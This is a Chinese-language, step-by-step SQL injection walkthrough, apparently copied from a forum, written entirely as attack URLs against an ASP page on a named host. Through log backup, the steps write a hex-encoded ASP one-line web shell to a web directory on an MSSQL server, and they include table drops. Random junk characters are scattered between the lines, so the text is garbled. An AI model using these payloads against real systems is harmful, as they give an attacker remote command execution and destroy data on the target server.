第一步
" X4 Q" L0 i) P; f% u& hhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
3 q) b# w- Q6 B+ R
7 ^& e. K; o4 C( o9 E第二步:7 c- q$ S: q8 A5 R9 Y0 @
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
% [: h9 u, |* ~6 `% t7 {* X0 ~$ t& Z. ^ Z
第三步
/ t8 J* a' z9 S) W2 `* F) `http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
9 n- a4 b# @( E; U9 n9 r8 i: H o2 R5 G* L& ]- h( [
第四步
% V6 z# ~" H2 I! l) Whttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
/ c8 ]5 h& E4 V: Z7 r2 m2 F* Z, }4 R
第五步- z& D; A1 h, X7 M/ e5 g/ |7 U
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& k. {# @& A- V
* q( d/ Z" L `9 _第六步7 U6 X: c- X/ F$ y d+ s2 B) E" Z
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--0 H8 W9 N, k6 D5 i7 T
, F5 g- s8 p" {. z
第七步1 F* a& d& b0 E( K# N7 X' X+ M
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
$ f6 F) d6 E% Z' F
) m$ @$ _; X/ a; d# p9 r第八步# P! W/ |6 X0 Z0 N7 @; ^" [, S
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--% h) D& x! g0 K8 C9 j
; j: o3 B. L# q; p$ L
第九步
0 ?$ h8 I9 \& [http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--1 g7 h: M3 n' I2 M) x. i
|